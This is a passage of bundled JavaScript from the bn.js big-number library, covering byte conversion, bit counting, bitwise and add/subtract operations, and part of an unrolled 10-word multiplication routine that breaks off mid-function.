    BN.prototype._toArrayLikeBE = function _toArrayLikeBE(res, byteLength) {
        var position = res.length - 1;
        var carry = 0;
        for(var i = 0, shift = 0; i < this.length; i++){
            var word = this.words[i] << shift | carry;
            res[position--] = word & 0xff;
            if (position >= 0) res[position--] = word >> 8 & 0xff;
            if (position >= 0) res[position--] = word >> 16 & 0xff;
            if (shift === 6) {
                if (position >= 0) res[position--] = word >> 24 & 0xff;
                carry = 0;
                shift = 0;
            } else {
                carry = word >>> 24;
                shift += 2;
            }
        }
        if (position >= 0) {
            res[position--] = carry;
            while(position >= 0)res[position--] = 0;
        }
    };
    if (Math.clz32) BN.prototype._countBits = function _countBits(w) {
        return 32 - Math.clz32(w);
    };
    else BN.prototype._countBits = function _countBits(w) {
        var t = w;
        var r = 0;
        if (t >= 0x1000) {
            r += 13;
            t >>>= 13;
        }
        if (t >= 0x40) {
            r += 7;
            t >>>= 7;
        }
        if (t >= 0x8) {
            r += 4;
            t >>>= 4;
        }
        if (t >= 0x02) {
            r += 2;
            t >>>= 2;
        }
        return r + t;
    };
    BN.prototype._zeroBits = function _zeroBits(w) {
        // Short-cut
        if (w === 0) return 26;
        var t = w;
        var r = 0;
        if ((t & 0x1fff) === 0) {
            r += 13;
            t >>>= 13;
        }
        if ((t & 0x7f) === 0) {
            r += 7;
            t >>>= 7;
        }
        if ((t & 0xf) === 0) {
            r += 4;
            t >>>= 4;
        }
        if ((t & 0x3) === 0) {
            r += 2;
            t >>>= 2;
        }
        if ((t & 0x1) === 0) r++;
        return r;
    };
    // Return number of used bits in a BN
    BN.prototype.bitLength = function bitLength() {
        var w = this.words[this.length - 1];
        var hi = this._countBits(w);
        return (this.length - 1) * 26 + hi;
    };
    function toBitArray(num) {
        var w = new Array(num.bitLength());
        for(var bit = 0; bit < w.length; bit++){
            var off = bit / 26 | 0;
            var wbit = bit % 26;
            w[bit] = num.words[off] >>> wbit & 0x01;
        }
        return w;
    }
    // Number of trailing zero bits
    BN.prototype.zeroBits = function zeroBits() {
        if (this.isZero()) return 0;
        var r = 0;
        for(var i = 0; i < this.length; i++){
            var b = this._zeroBits(this.words[i]);
            r += b;
            if (b !== 26) break;
        }
        return r;
    };
    BN.prototype.byteLength = function byteLength() {
        return Math.ceil(this.bitLength() / 8);
    };
    BN.prototype.toTwos = function toTwos(width) {
        if (this.negative !== 0) return this.abs().inotn(width).iaddn(1);
        return this.clone();
    };
    BN.prototype.fromTwos = function fromTwos(width) {
        if (this.testn(width - 1)) return this.notn(width).iaddn(1).ineg();
        return this.clone();
    };
    BN.prototype.isNeg = function isNeg() {
        return this.negative !== 0;
    };
    // Return negative clone of `this`
    BN.prototype.neg = function neg() {
        return this.clone().ineg();
    };
    BN.prototype.ineg = function ineg() {
        if (!this.isZero()) this.negative ^= 1;
        return this;
    };
    // Or `num` with `this` in-place
    BN.prototype.iuor = function iuor(num) {
        while(this.length < num.length)this.words[this.length++] = 0;
        for(var i = 0; i < num.length; i++)this.words[i] = this.words[i] | num.words[i];
        return this._strip();
    };
    BN.prototype.ior = function ior(num) {
        assert((this.negative | num.negative) === 0);
        return this.iuor(num);
    };
    // Or `num` with `this`
    BN.prototype.or = function or(num) {
        if (this.length > num.length) return this.clone().ior(num);
        return num.clone().ior(this);
    };
    BN.prototype.uor = function uor(num) {
        if (this.length > num.length) return this.clone().iuor(num);
        return num.clone().iuor(this);
    };
    // And `num` with `this` in-place
    BN.prototype.iuand = function iuand(num) {
        // b = min-length(num, this)
        var b;
        if (this.length > num.length) b = num;
        else b = this;
        for(var i = 0; i < b.length; i++)this.words[i] = this.words[i] & num.words[i];
        this.length = b.length;
        return this._strip();
    };
    BN.prototype.iand = function iand(num) {
        assert((this.negative | num.negative) === 0);
        return this.iuand(num);
    };
    // And `num` with `this`
    BN.prototype.and = function and(num) {
        if (this.length > num.length) return this.clone().iand(num);
        return num.clone().iand(this);
    };
    BN.prototype.uand = function uand(num) {
        if (this.length > num.length) return this.clone().iuand(num);
        return num.clone().iuand(this);
    };
    // Xor `num` with `this` in-place
    BN.prototype.iuxor = function iuxor(num) {
        // a.length > b.length
        var a;
        var b;
        if (this.length > num.length) {
            a = this;
            b = num;
        } else {
            a = num;
            b = this;
        }
        for(var i = 0; i < b.length; i++)this.words[i] = a.words[i] ^ b.words[i];
        if (this !== a) for(; i < a.length; i++)this.words[i] = a.words[i];
        this.length = a.length;
        return this._strip();
    };
    BN.prototype.ixor = function ixor(num) {
        assert((this.negative | num.negative) === 0);
        return this.iuxor(num);
    };
    // Xor `num` with `this`
    BN.prototype.xor = function xor(num) {
        if (this.length > num.length) return this.clone().ixor(num);
        return num.clone().ixor(this);
    };
    BN.prototype.uxor = function uxor(num) {
        if (this.length > num.length) return this.clone().iuxor(num);
        return num.clone().iuxor(this);
    };
    // Not ``this`` with ``width`` bitwidth
    BN.prototype.inotn = function inotn(width) {
        assert(typeof width === "number" && width >= 0);
        var bytesNeeded = Math.ceil(width / 26) | 0;
        var bitsLeft = width % 26;
        // Extend the buffer with leading zeroes
        this._expand(bytesNeeded);
        if (bitsLeft > 0) bytesNeeded--;
        // Handle complete words
        for(var i = 0; i < bytesNeeded; i++)this.words[i] = ~this.words[i] & 0x3ffffff;
        // Handle the residue
        if (bitsLeft > 0) this.words[i] = ~this.words[i] & 0x3ffffff >> 26 - bitsLeft;
        // And remove leading zeroes
        return this._strip();
    };
    BN.prototype.notn = function notn(width) {
        return this.clone().inotn(width);
    };
    // Set `bit` of `this`
    BN.prototype.setn = function setn(bit, val) {
        assert(typeof bit === "number" && bit >= 0);
        var off = bit / 26 | 0;
        var wbit = bit % 26;
        this._expand(off + 1);
        if (val) this.words[off] = this.words[off] | 1 << wbit;
        else this.words[off] = this.words[off] & ~(1 << wbit);
        return this._strip();
    };
    // Add `num` to `this` in-place
    BN.prototype.iadd = function iadd(num) {
        var r;
        // negative + positive
        if (this.negative !== 0 && num.negative === 0) {
            this.negative = 0;
            r = this.isub(num);
            this.negative ^= 1;
            return this._normSign();
        // positive + negative
        } else if (this.negative === 0 && num.negative !== 0) {
            num.negative = 0;
            r = this.isub(num);
            num.negative = 1;
            return r._normSign();
        }
        // a.length > b.length
        var a, b;
        if (this.length > num.length) {
            a = this;
            b = num;
        } else {
            a = num;
            b = this;
        }
        var carry = 0;
        for(var i = 0; i < b.length; i++){
            r = (a.words[i] | 0) + (b.words[i] | 0) + carry;
            this.words[i] = r & 0x3ffffff;
            carry = r >>> 26;
        }
        for(; carry !== 0 && i < a.length; i++){
            r = (a.words[i] | 0) + carry;
            this.words[i] = r & 0x3ffffff;
            carry = r >>> 26;
        }
        this.length = a.length;
        if (carry !== 0) {
            this.words[this.length] = carry;
            this.length++;
        // Copy the rest of the words
        } else if (a !== this) for(; i < a.length; i++)this.words[i] = a.words[i];
        return this;
    };
    // Add `num` to `this`
    BN.prototype.add = function add(num) {
        var res;
        if (num.negative !== 0 && this.negative === 0) {
            num.negative = 0;
            res = this.sub(num);
            num.negative ^= 1;
            return res;
        } else if (num.negative === 0 && this.negative !== 0) {
            this.negative = 0;
            res = num.sub(this);
            this.negative = 1;
            return res;
        }
        if (this.length > num.length) return this.clone().iadd(num);
        return num.clone().iadd(this);
    };
    // Subtract `num` from `this` in-place
    BN.prototype.isub = function isub(num) {
        // this - (-num) = this + num
        if (num.negative !== 0) {
            num.negative = 0;
            var r = this.iadd(num);
            num.negative = 1;
            return r._normSign();
        // -this - num = -(this + num)
        } else if (this.negative !== 0) {
            this.negative = 0;
            this.iadd(num);
            this.negative = 1;
            return this._normSign();
        }
        // At this point both numbers are positive
        var cmp = this.cmp(num);
        // Optimization - zeroify
        if (cmp === 0) {
            this.negative = 0;
            this.length = 1;
            this.words[0] = 0;
            return this;
        }
        // a > b
        var a, b;
        if (cmp > 0) {
            a = this;
            b = num;
        } else {
            a = num;
            b = this;
        }
        var carry = 0;
        for(var i = 0; i < b.length; i++){
            r = (a.words[i] | 0) - (b.words[i] | 0) + carry;
            carry = r >> 26;
            this.words[i] = r & 0x3ffffff;
        }
        for(; carry !== 0 && i < a.length; i++){
            r = (a.words[i] | 0) + carry;
            carry = r >> 26;
            this.words[i] = r & 0x3ffffff;
        }
        // Copy rest of the words
        if (carry === 0 && i < a.length && a !== this) for(; i < a.length; i++)this.words[i] = a.words[i];
        this.length = Math.max(this.length, i);
        if (a !== this) this.negative = 1;
        return this._strip();
    };
    // Subtract `num` from `this`
    BN.prototype.sub = function sub(num) {
        return this.clone().isub(num);
    };
    function smallMulTo(self, num, out) {
        out.negative = num.negative ^ self.negative;
        var len = self.length + num.length | 0;
        out.length = len;
        len = len - 1 | 0;
        // Peel one iteration (compiler can't do it, because of code complexity)
        var a = self.words[0] | 0;
        var b = num.words[0] | 0;
        var r = a * b;
        var lo = r & 0x3ffffff;
        var carry = r / 0x4000000 | 0;
        out.words[0] = lo;
        for(var k = 1; k < len; k++){
            // Sum all words with the same `i + j = k` and accumulate `ncarry`,
            // note that ncarry could be >= 0x3ffffff
            var ncarry = carry >>> 26;
            var rword = carry & 0x3ffffff;
            var maxJ = Math.min(k, num.length - 1);
            for(var j = Math.max(0, k - self.length + 1); j <= maxJ; j++){
                var i = k - j | 0;
                a = self.words[i] | 0;
                b = num.words[j] | 0;
                r = a * b + rword;
                ncarry += r / 0x4000000 | 0;
                rword = r & 0x3ffffff;
            }
            out.words[k] = rword | 0;
            carry = ncarry | 0;
        }
        if (carry !== 0) out.words[k] = carry | 0;
        else out.length--;
        return out._strip();
    }
    // TODO(indutny): it may be reasonable to omit it for users who don't need
    // to work with 256-bit numbers, otherwise it gives 20% improvement for 256-bit
    // multiplication (like elliptic secp256k1).
    var comb10MulTo = function comb10MulTo(self, num, out) {
        var a = self.words;
        var b = num.words;
        var o = out.words;
        var c = 0;
        var lo;
        var mid;
        var hi;
        var a0 = a[0] | 0;
        var al0 = a0 & 0x1fff;
        var ah0 = a0 >>> 13;
        var a1 = a[1] | 0;
        var al1 = a1 & 0x1fff;
        var ah1 = a1 >>> 13;
        var a2 = a[2] | 0;
        var al2 = a2 & 0x1fff;
        var ah2 = a2 >>> 13;
        var a3 = a[3] | 0;
        var al3 = a3 & 0x1fff;
        var ah3 = a3 >>> 13;
        var a4 = a[4] | 0;
        var al4 = a4 & 0x1fff;
        var ah4 = a4 >>> 13;
        var a5 = a[5] | 0;
        var al5 = a5 & 0x1fff;
        var ah5 = a5 >>> 13;
        var a6 = a[6] | 0;
        var al6 = a6 & 0x1fff;
        var ah6 = a6 >>> 13;
        var a7 = a[7] | 0;
        var al7 = a7 & 0x1fff;
        var ah7 = a7 >>> 13;
        var a8 = a[8] | 0;
        var al8 = a8 & 0x1fff;
        var ah8 = a8 >>> 13;
        var a9 = a[9] | 0;
        var al9 = a9 & 0x1fff;
        var ah9 = a9 >>> 13;
        var b0 = b[0] | 0;
        var bl0 = b0 & 0x1fff;
        var bh0 = b0 >>> 13;
        var b1 = b[1] | 0;
        var bl1 = b1 & 0x1fff;
        var bh1 = b1 >>> 13;
        var b2 = b[2] | 0;
        var bl2 = b2 & 0x1fff;
        var bh2 = b2 >>> 13;
        var b3 = b[3] | 0;
        var bl3 = b3 & 0x1fff;
        var bh3 = b3 >>> 13;
        var b4 = b[4] | 0;
        var bl4 = b4 & 0x1fff;
        var bh4 = b4 >>> 13;
        var b5 = b[5] | 0;
        var bl5 = b5 & 0x1fff;
        var bh5 = b5 >>> 13;
        var b6 = b[6] | 0;
        var bl6 = b6 & 0x1fff;
        var bh6 = b6 >>> 13;
        var b7 = b[7] | 0;
        var bl7 = b7 & 0x1fff;
        var bh7 = b7 >>> 13;
        var b8 = b[8] | 0;
        var bl8 = b8 & 0x1fff;
        var bh8 = b8 >>> 13;
        var b9 = b[9] | 0;
        var bl9 = b9 & 0x1fff;
        var bh9 = b9 >>> 13;
        out.negative = self.negative ^ num.negative;
        out.length = 19;
        /* k = 0 */ lo = Math.imul(al0, bl0);
        mid = Math.imul(al0, bh0);
        mid = mid + Math.imul(ah0, bl0) | 0;
        hi = Math.imul(ah0, bh0);
        var w0 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w0 >>> 26) | 0;
        w0 &= 0x3ffffff;
        /* k = 1 */ lo = Math.imul(al1, bl0);
        mid = Math.imul(al1, bh0);
        mid = mid + Math.imul(ah1, bl0) | 0;
        hi = Math.imul(ah1, bh0);
        lo = lo + Math.imul(al0, bl1) | 0;
        mid = mid + Math.imul(al0, bh1) | 0;
        mid = mid + Math.imul(ah0, bl1) | 0;
        hi = hi + Math.imul(ah0, bh1) | 0;
        var w1 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w1 >>> 26) | 0;
        w1 &= 0x3ffffff;
        /* k = 2 */ lo = Math.imul(al2, bl0);
        mid = Math.imul(al2, bh0);
        mid = mid + Math.imul(ah2, bl0) | 0;
        hi = Math.imul(ah2, bh0);
        lo = lo + Math.imul(al1, bl1) | 0;
        mid = mid + Math.imul(al1, bh1) | 0;
        mid = mid + Math.imul(ah1, bl1) | 0;
        hi = hi + Math.imul(ah1, bh1) | 0;
        lo = lo + Math.imul(al0, bl2) | 0;
        mid = mid + Math.imul(al0, bh2) | 0;
        mid = mid + Math.imul(ah0, bl2) | 0;
        hi = hi + Math.imul(ah0, bh2) | 0;
        var w2 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w2 >>> 26) | 0;
        w2 &= 0x3ffffff;
        /* k = 3 */ lo = Math.imul(al3, bl0);
        mid = Math.imul(al3, bh0);
        mid = mid + Math.imul(ah3, bl0) | 0;
        hi = Math.imul(ah3, bh0);
        lo = lo + Math.imul(al2, bl1) | 0;
        mid = mid + Math.imul(al2, bh1) | 0;
        mid = mid + Math.imul(ah2, bl1) | 0;
        hi = hi + Math.imul(ah2, bh1) | 0;
        lo = lo + Math.imul(al1, bl2) | 0;
        mid = mid + Math.imul(al1, bh2) | 0;
        mid = mid + Math.imul(ah1, bl2) | 0;
        hi = hi + Math.imul(ah1, bh2) | 0;
        lo = lo + Math.imul(al0, bl3) | 0;
        mid = mid + Math.imul(al0, bh3) | 0;
        mid = mid + Math.imul(ah0, bl3) | 0;
        hi = hi + Math.imul(ah0, bh3) | 0;
        var w3 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w3 >>> 26) | 0;
        w3 &= 0x3ffffff;
        /* k = 4 */ lo = Math.imul(al4, bl0);
        mid = Math.imul(al4, bh0);
        mid = mid + Math.imul(ah4, bl0) | 0;
        hi = Math.imul(ah4, bh0);
        lo = lo + Math.imul(al3, bl1) | 0;
        mid = mid + Math.imul(al3, bh1) | 0;
        mid = mid + Math.imul(ah3, bl1) | 0;
        hi = hi + Math.imul(ah3, bh1) | 0;
        lo = lo + Math.imul(al2, bl2) | 0;
        mid = mid + Math.imul(al2, bh2) | 0;
        mid = mid + Math.imul(ah2, bl2) | 0;
        hi = hi + Math.imul(ah2, bh2) | 0;
        lo = lo + Math.imul(al1, bl3) | 0;
        mid = mid + Math.imul(al1, bh3) | 0;
        mid = mid + Math.imul(ah1, bl3) | 0;
        hi = hi + Math.imul(ah1, bh3) | 0;
        lo = lo + Math.imul(al0, bl4) | 0;
        mid = mid + Math.imul(al0, bh4) | 0;
        mid = mid + Math.imul(ah0, bl4) | 0;
        hi = hi + Math.imul(ah0, bh4) | 0;
        var w4 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w4 >>> 26) | 0;
        w4 &= 0x3ffffff;
        /* k = 5 */ lo = Math.imul(al5, bl0);
        mid = Math.imul(al5, bh0);
        mid = mid + Math.imul(ah5, bl0) | 0;
        hi = Math.imul(ah5, bh0);
        lo = lo + Math.imul(al4, bl1) | 0;
        mid = mid + Math.imul(al4, bh1) | 0;
        mid = mid + Math.imul(ah4, bl1) | 0;
        hi = hi + Math.imul(ah4, bh1) | 0;
        lo = lo + Math.imul(al3, bl2) | 0;
        mid = mid + Math.imul(al3, bh2) | 0;
        mid = mid + Math.imul(ah3, bl2) | 0;
        hi = hi + Math.imul(ah3, bh2) | 0;
        lo = lo + Math.imul(al2, bl3) | 0;
        mid = mid + Math.imul(al2, bh3) | 0;
        mid = mid + Math.imul(ah2, bl3) | 0;
        hi = hi + Math.imul(ah2, bh3) | 0;
        lo = lo + Math.imul(al1, bl4) | 0;
        mid = mid + Math.imul(al1, bh4) | 0;
        mid = mid + Math.imul(ah1, bl4) | 0;
        hi = hi + Math.imul(ah1, bh4) | 0;
        lo = lo + Math.imul(al0, bl5) | 0;
        mid = mid + Math.imul(al0, bh5) | 0;
        mid = mid + Math.imul(ah0, bl5) | 0;
        hi = hi + Math.imul(ah0, bh5) | 0;
        var w5 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w5 >>> 26) | 0;
        w5 &= 0x3ffffff;
        /* k = 6 */ lo = Math.imul(al6, bl0);
        mid = Math.imul(al6, bh0);
        mid = mid + Math.imul(ah6, bl0) | 0;
        hi = Math.imul(ah6, bh0);
        lo = lo + Math.imul(al5, bl1) | 0;
        mid = mid + Math.imul(al5, bh1) | 0;
        mid = mid + Math.imul(ah5, bl1) | 0;
        hi = hi + Math.imul(ah5, bh1) | 0;
        lo = lo + Math.imul(al4, bl2) | 0;
        mid = mid + Math.imul(al4, bh2) | 0;
        mid = mid + Math.imul(ah4, bl2) | 0;
        hi = hi + Math.imul(ah4, bh2) | 0;
        lo = lo + Math.imul(al3, bl3) | 0;
        mid = mid + Math.imul(al3, bh3) | 0;
        mid = mid + Math.imul(ah3, bl3) | 0;
        hi = hi + Math.imul(ah3, bh3) | 0;
        lo = lo + Math.imul(al2, bl4) | 0;
        mid = mid + Math.imul(al2, bh4) | 0;
        mid = mid + Math.imul(ah2, bl4) | 0;
        hi = hi + Math.imul(ah2, bh4) | 0;
        lo = lo + Math.imul(al1, bl5) | 0;
        mid = mid + Math.imul(al1, bh5) | 0;
        mid = mid + Math.imul(ah1, bl5) | 0;
        hi = hi + Math.imul(ah1, bh5) | 0;
        lo = lo + Math.imul(al0, bl6) | 0;
        mid = mid + Math.imul(al0, bh6) | 0;
        mid = mid + Math.imul(ah0, bl6) | 0;
        hi = hi + Math.imul(ah0, bh6) | 0;
        var w6 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w6 >>> 26) | 0;
        w6 &= 0x3ffffff;
        /* k = 7 */ lo = Math.imul(al7, bl0);
        mid = Math.imul(al7, bh0);
        mid = mid + Math.imul(ah7, bl0) | 0;
        hi = Math.imul(ah7, bh0);
        lo = lo + Math.imul(al6, bl1) | 0;
        mid = mid + Math.imul(al6, bh1) | 0;
        mid = mid + Math.imul(ah6, bl1) | 0;
        hi = hi + Math.imul(ah6, bh1) | 0;
        lo = lo + Math.imul(al5, bl2) | 0;
        mid = mid + Math.imul(al5, bh2) | 0;
        mid = mid + Math.imul(ah5, bl2) | 0;
        hi = hi + Math.imul(ah5, bh2) | 0;
        lo = lo + Math.imul(al4, bl3) | 0;
        mid = mid + Math.imul(al4, bh3) | 0;
        mid = mid + Math.imul(ah4, bl3) | 0;
        hi = hi + Math.imul(ah4, bh3) | 0;
        lo = lo + Math.imul(al3, bl4) | 0;
        mid = mid + Math.imul(al3, bh4) | 0;
        mid = mid + Math.imul(ah3, bl4) | 0;
        hi = hi + Math.imul(ah3, bh4) | 0;
        lo = lo + Math.imul(al2, bl5) | 0;
        mid = mid + Math.imul(al2, bh5) | 0;
        mid = mid + Math.imul(ah2, bl5) | 0;
        hi = hi + Math.imul(ah2, bh5) | 0;
        lo = lo + Math.imul(al1, bl6) | 0;
        mid = mid + Math.imul(al1, bh6) | 0;
        mid = mid + Math.imul(ah1, bl6) | 0;
        hi = hi + Math.imul(ah1, bh6) | 0;
        lo = lo + Math.imul(al0, bl7) | 0;
        mid = mid + Math.imul(al0, bh7) | 0;
        mid = mid + Math.imul(ah0, bl7) | 0;
        hi = hi + Math.imul(ah0, bh7) | 0;
        var w7 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w7 >>> 26) | 0;
        w7 &= 0x3ffffff;
        /* k = 8 */ lo = Math.imul(al8, bl0);
        mid = Math.imul(al8, bh0);
        mid = mid + Math.imul(ah8, bl0) | 0;
        hi = Math.imul(ah8, bh0);
        lo = lo + Math.imul(al7, bl1) | 0;
        mid = mid + Math.imul(al7, bh1) | 0;
        mid = mid + Math.imul(ah7, bl1) | 0;
        hi = hi + Math.imul(ah7, bh1) | 0;
        lo = lo + Math.imul(al6, bl2) | 0;
        mid = mid + Math.imul(al6, bh2) | 0;
        mid = mid + Math.imul(ah6, bl2) | 0;
        hi = hi + Math.imul(ah6, bh2) | 0;
        lo = lo + Math.imul(al5, bl3) | 0;
        mid = mid + Math.imul(al5, bh3) | 0;
        mid = mid + Math.imul(ah5, bl3) | 0;
        hi = hi + Math.imul(ah5, bh3) | 0;
        lo = lo + Math.imul(al4, bl4) | 0;
        mid = mid + Math.imul(al4, bh4) | 0;
        mid = mid + Math.imul(ah4, bl4) | 0;
        hi = hi + Math.imul(ah4, bh4) | 0;
        lo = lo + Math.imul(al3, bl5) | 0;
        mid = mid + Math.imul(al3, bh5) | 0;
        mid = mid + Math.imul(ah3, bl5) | 0;
        hi = hi + Math.imul(ah3, bh5) | 0;
        lo = lo + Math.imul(al2, bl6) | 0;
        mid = mid + Math.imul(al2, bh6) | 0;
        mid = mid + Math.imul(ah2, bl6) | 0;
        hi = hi + Math.imul(ah2, bh6) | 0;
        lo = lo + Math.imul(al1, bl7) | 0;
        mid = mid + Math.imul(al1, bh7) | 0;
        mid = mid + Math.imul(ah1, bl7) | 0;
        hi = hi + Math.imul(ah1, bh7) | 0;
        lo = lo + Math.imul(al0, bl8) | 0;
        mid = mid + Math.imul(al0, bh8) | 0;
        mid = mid + Math.imul(ah0, bl8) | 0;
        hi = hi + Math.imul(ah0, bh8) | 0;
        var w8 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w8 >>> 26) | 0;
        w8 &= 0x3ffffff;
        /* k = 9 */ lo = Math.imul(al9, bl0);
        mid = Math.imul(al9, bh0);
        mid = mid + Math.imul(ah9, bl0) | 0;
        hi = Math.imul(ah9, bh0);
        lo = lo + Math.imul(al8, bl1) | 0;
        mid = mid + Math.imul(al8, bh1) | 0;
        mid = mid + Math.imul(ah8, bl1) | 0;
        hi = hi + Math.imul(ah8, bh1) | 0;
        lo = lo + Math.imul(al7, bl2) | 0;
        mid = mid + Math.imul(al7, bh2) | 0;
        mid = mid + Math.imul(ah7, bl2) | 0;
        hi = hi + Math.imul(ah7, bh2) | 0;
        lo = lo + Math.imul(al6, bl3) | 0;
        mid = mid + Math.imul(al6, bh3) | 0;
        mid = mid + Math.imul(ah6, bl3) | 0;
        hi = hi + Math.imul(ah6, bh3) | 0;
        lo = lo + Math.imul(al5, bl4) | 0;
        mid = mid + Math.imul(al5, bh4) | 0;
        mid = mid + Math.imul(ah5, bl4) | 0;
        hi = hi + Math.imul(ah5, bh4) | 0;
        lo = lo + Math.imul(al4, bl5) | 0;
        mid = mid + Math.imul(al4, bh5) | 0;
        mid = mid + Math.imul(ah4, bl5) | 0;
        hi = hi + Math.imul(ah4, bh5) | 0;
        lo = lo + Math.imul(al3, bl6) | 0;
        mid = mid + Math.imul(al3, bh6) | 0;
        mid = mid + Math.imul(ah3, bl6) | 0;
        hi = hi + Math.imul(ah3, bh6) | 0;
        lo = lo + Math.imul(al2, bl7) | 0;
        mid = mid + Math.imul(al2, bh7) | 0;
        mid = mid + Math.imul(ah2, bl7) | 0;
        hi = hi + Math.imul(ah2, bh7) | 0;
        lo = lo + Math.imul(al1, bl8) | 0;
        mid = mid + Math.imul(al1, bh8) | 0;
        mid = mid + Math.imul(ah1, bl8) | 0;
        hi = hi + Math.imul(ah1, bh8) | 0;
        lo = lo + Math.imul(al0, bl9) | 0;
        mid = mid + Math.imul(al0, bh9) | 0;
        mid = mid + Math.imul(ah0, bl9) | 0;
        hi = hi + Math.imul(ah0, bh9) | 0;
        var w9 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w9 >>> 26) | 0;
        w9 &= 0x3ffffff;
        /* k = 10 */ lo = Math.imul(al9, bl1);
        mid = Math.imul(al9, bh1);
        mid = mid + Math.imul(ah9, bl1) | 0;
        hi = Math.imul(ah9, bh1);
        lo = lo + Math.imul(al8, bl2) | 0;
        mid = mid + Math.imul(al8, bh2) | 0;
        mid = mid + Math.imul(ah8, bl2) | 0;
        hi = hi + Math.imul(ah8, bh2) | 0;
        lo = lo + Math.imul(al7, bl3) | 0;
        mid = mid + Math.imul(al7, bh3) | 0;
        mid = mid + Math.imul(ah7, bl3) | 0;
        hi = hi + Math.imul(ah7, bh3) | 0;
        lo = lo + Math.imul(al6, bl4) | 0;
        mid = mid + Math.imul(al6, bh4) | 0;
        mid = mid + Math.imul(ah6, bl4) | 0;
        hi = hi + Math.imul(ah6, bh4) | 0;
        lo = lo + Math.imul(al5, bl5) | 0;
        mid = mid + Math.imul(al5, bh5) | 0;
        mid = mid + Math.imul(ah5, bl5) | 0;
        hi = hi + Math.imul(ah5, bh5) | 0;
        lo = lo + Math.imul(al4, bl6) | 0;
        mid = mid + Math.imul(al4, bh6) | 0;
        mid = mid + Math.imul(ah4, bl6) | 0;
        hi = hi + Math.imul(ah4, bh6) | 0;
        lo = lo + Math.imul(al3, bl7) | 0;
        mid = mid + Math.imul(al3, bh7) | 0;
        mid = mid + Math.imul(ah3, bl7) | 0;
        hi = hi + Math.imul(ah3, bh7) | 0;
        lo = lo + Math.imul(al2, bl8) | 0;
        mid = mid + Math.imul(al2, bh8) | 0;
        mid = mid + Math.imul(ah2, bl8) | 0;
        hi = hi + Math.imul(ah2, bh8) | 0;
        lo = lo + Math.imul(al1, bl9) | 0;
        mid = mid + Math.imul(al1, bh9) | 0;
        mid = mid + Math.imul(ah1, bl9) | 0;
        hi = hi + Math.imul(ah1, bh9) | 0;
        var w10 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w10 >>> 26) | 0;
        w10 &= 0x3ffffff;
        /* k = 11 */ lo = Math.imul(al9, bl2);
        mid = Math.imul(al9, bh2);
        mid = mid + Math.imul(ah9, bl2) | 0;
        hi = Math.imul(ah9, bh2);
        lo = lo + Math.imul(al8, bl3) | 0;
        mid = mid + Math.imul(al8, bh3) | 0;
        mid = mid + Math.imul(ah8, bl3) | 0;
        hi = hi + Math.imul(ah8, bh3) | 0;
        lo = lo + Math.imul(al7, bl4) | 0;
        mid = mid + Math.imul(al7, bh4) | 0;
        mid = mid + Math.imul(ah7, bl4) | 0;
        hi = hi + Math.imul(ah7, bh4) | 0;
        lo = lo + Math.imul(al6, bl5) | 0;
        mid = mid + Math.imul(al6, bh5) | 0;
        mid = mid + Math.imul(ah6, bl5) | 0;
        hi = hi + Math.imul(ah6, bh5) | 0;
        lo = lo + Math.imul(al5, bl6) | 0;
        mid = mid + Math.imul(al5, bh6) | 0;
        mid = mid + Math.imul(ah5, bl6) | 0;
        hi = hi + Math.imul(ah5, bh6) | 0;
        lo = lo + Math.imul(al4, bl7) | 0;
        mid = mid + Math.imul(al4, bh7) | 0;
        mid = mid + Math.imul(ah4, bl7) | 0;
        hi = hi + Math.imul(ah4, bh7) | 0;
        lo = lo + Math.imul(al3, bl8) | 0;
        mid = mid + Math.imul(al3, bh8) | 0;
        mid = mid + Math.imul(ah3, bl8) | 0;
        hi = hi + Math.imul(ah3, bh8) | 0;
        lo = lo + Math.imul(al2, bl9) | 0;
        mid = mid + Math.imul(al2, bh9) | 0;
        mid = mid + Math.imul(ah2, bl9) | 0;
        hi = hi + Math.imul(ah2, bh9) | 0;
        var w11 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w11 >>> 26) | 0;
        w11 &= 0x3ffffff;
        /* k = 12 */ lo = Math.imul(al9, bl3);
        mid = Math.imul(al9, bh3);
        mid = mid + Math.imul(ah9, bl3) | 0;
        hi = Math.imul(ah9, bh3);
        lo = lo + Math.imul(al8, bl4) | 0;
        mid = mid + Math.imul(al8, bh4) | 0;
        mid = mid + Math.imul(ah8, bl4) | 0;
        hi = hi + Math.imul(ah8, bh4) | 0;
        lo = lo + Math.imul(al7, bl5) | 0;
        mid = mid + Math.imul(al7, bh5) | 0;
        mid = mid + Math.imul(ah7, bl5) | 0;
        hi = hi + Math.imul(ah7, bh5) | 0;
        lo = lo + Math.imul(al6, bl6) | 0;
        mid = mid + Math.imul(al6, bh6) | 0;
        mid = mid + Math.imul(ah6, bl6) | 0;
        hi = hi + Math.imul(ah6, bh6) | 0;
        lo = lo + Math.imul(al5, bl7) | 0;
        mid = mid + Math.imul(al5, bh7) | 0;
        mid = mid + Math.imul(ah5, bl7) | 0;
        hi = hi + Math.imul(ah5, bh7) | 0;
        lo = lo + Math.imul(al4, bl8) | 0;
        mid = mid + Math.imul(al4, bh8) | 0;
        mid = mid + Math.imul(ah4, bl8) | 0;
        hi = hi + Math.imul(ah4, bh8) | 0;
        lo = lo + Math.imul(al3, bl9) | 0;
        mid = mid + Math.imul(al3, bh9) | 0;
        mid = mid + Math.imul(ah3, bl9) | 0;
        hi = hi + Math.imul(ah3, bh9) | 0;
        var w12 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
